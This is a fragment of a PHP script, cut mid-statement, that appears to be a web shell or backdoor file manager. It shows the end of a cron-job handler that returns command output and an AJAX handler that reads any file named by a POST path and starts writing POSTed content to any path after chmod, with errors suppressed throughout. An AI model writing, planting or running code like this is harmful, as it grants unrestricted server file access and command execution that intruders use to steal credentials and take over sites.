ved', 'output' => trim($out ? $out : '')]);
        exit;
    }

    echo json_encode(['err' => 'unknown cron action']);
    exit;
}
// === END CRONJOB HANDLER ===

// === FILE OPERATION AJAX HANDLER ===
if (isset($_POST['file_action']) && isAuthenticated()) {
    header('Content-Type: application/json; charset=utf-8');
    $fAct = $_POST['file_action'];
    $fPath = $_POST['file_path'] ?? '';

    if ($fAct === 'get_content') {
        if (!file_exists($fPath) || !is_file($fPath)) {
            echo json_encode(['err' => 'File not found']);
            exit;
        }
        $content = @file_get_contents($fPath);
        echo json_encode(['ok' => true, 'content' => ($content !== false ? $content : ''), 'name' => basename($fPath)]);
        exit;
    }

    if ($fAct === 'save_content') {
        $content = $_POST['file_content'] ?? '';
        if (empty($fPath)) { echo json_encode(['err' => 'No file path']); exit; }
        @chmod($fPath, is_dir($fPath) ? 0755 : 0644);
        @chmod